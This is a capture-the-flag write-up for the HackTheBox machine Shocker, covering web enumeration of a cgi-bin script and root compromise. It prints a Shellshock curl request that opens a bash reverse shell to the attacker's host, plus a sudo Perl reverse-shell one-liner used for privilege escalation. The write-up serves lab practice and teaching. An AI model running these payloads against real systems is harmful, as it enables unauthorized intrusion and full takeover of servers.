HackTheBox - Shocker

Updated 29-03-2026
#htb #hackthebox #ctf #writeup #ffuf #linux

A Linux machine where directory enumeration uncovers a CGI script in an exposed cgi-bin directory — and a classic Bash vulnerability allows injecting commands through a crafted HTTP header.

Recon

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ target=10.129.12.47; ports=$(nmap -p- --min-rate=1000 -T4 "$target" 2>/dev/null | awk -F/ '/^[0-9]+\/tcp/ && /open/ {print $1}' | paste -sd, -); nmap -p"$ports" -sC -sV "$target"
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-02-17 06:16 EST
Nmap scan report for 10.129.12.47
Host is up (0.20s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.55 seconds

Foothold

Web Enumeration

Enumerating directories using ffuf reveals the cgi-bin directory.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
$ ffuf -c -u http://10.129.12.47/FUZZ -w /usr/share/dirb/wordlists/common.txt                                          

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.129.12.47/FUZZ
 :: Wordlist         : FUZZ: /usr/share/dirb/wordlists/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

                        [Status: 200, Size: 137, Words: 9, Lines: 10, Duration: 135ms]
.hta                    [Status: 403, Size: 291, Words: 22, Lines: 12, Duration: 261ms]
.htaccess               [Status: 403, Size: 296, Words: 22, Lines: 12, Duration: 264ms]
.htpasswd               [Status: 403, Size: 296, Words: 22, Lines: 12, Duration: 271ms]
cgi-bin/                [Status: 403, Size: 295, Words: 22, Lines: 12, Duration: 160ms]
index.html              [Status: 200, Size: 137, Words: 9, Lines: 10, Duration: 170ms]
server-status           [Status: 403, Size: 300, Words: 22, Lines: 12, Duration: 163ms]
:: Progress: [4614/4614] :: Job [1/1] :: 237 req/sec :: Duration: [0:00:17] :: Errors: 0 ::

CGI Enumeration

Next, enumerate cgi-bin for scripts/binaries.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
$ $ ffuf -c -u http://10.129.12.47/cgi-bin/FUZZ -w /usr/share/dirb/wordlists/common.txt -e .cgi,.pl,.py,.sh -fc 403

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.129.12.47/cgi-bin/FUZZ
 :: Wordlist         : FUZZ: /usr/share/dirb/wordlists/common.txt
 :: Extensions       : .cgi .pl .py .sh 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response status: 403
________________________________________________

user.sh                 [Status: 200, Size: 118, Words: 19, Lines: 8, Duration: 202ms]

A bash script named user.sh is accessible. Using curl, it appears to be an uptime test script.

1
2
3
4
5
6
$ curl http://10.129.12.47/cgi-bin/user.sh
Content-Type: text/plain

Just an uptime test script

 07:36:35 up  1:24,  0 users,  load average: 0.00, 0.00, 0.00

Exploit

If we look at HackTricks’ CGI Pentesting page, we’ll read about Shellshock.

ShellShock is a vulnerability that affects the widely used Bash command-line shell in Unix-based operating systems. It targets the ability of Bash to run commands passed by applications.

We can try Out-Of-Band Use Cookie as alternative to User-Agent to get a reverse shell.

Start a listener:

1
$ nc -lnvp 4242

Send the malicious curl request:

1
$ curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.16.103/4242 0>&1' http://10.129.12.47/cgi-bin/user.sh

The listener receives a shell, and we can grab the user flag.

1
2
3
4
5
$ nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.10.16.103] from (UNKNOWN) [10.129.12.47] 40776
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$

Privilege Escalation

Sudo Rights

Checking sudo permissions shows shelly can run /usr/bin/perl as root without a password.

1
2
3
4
5
6
7
8
9
shelly@Shocker:/usr/lib/cgi-bin$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

This allows a root reverse shell via sudo perl.

Root Shell

Start another listener on the attacker machine:

1
$ nc -lnvp 1111

Run perl with sudo using the reverse shell payload:

1
2
shelly@Shocker:/usr/lib/cgi-bin$ sudo perl -e 'use Socket;$i="10.10.16.103";$p=1111;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("bash -i");};'
<en(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("bash -i");};'

The listener receives a root shell:

1
2
3
4
5
$ nc -lnvp 1111
listening on [any] 1111 ...
connect to [10.10.16.103] from (UNKNOWN) [10.129.12.47] 52318
bash: no job control in this shell
root@Shocker:/usr/lib/cgi-bin#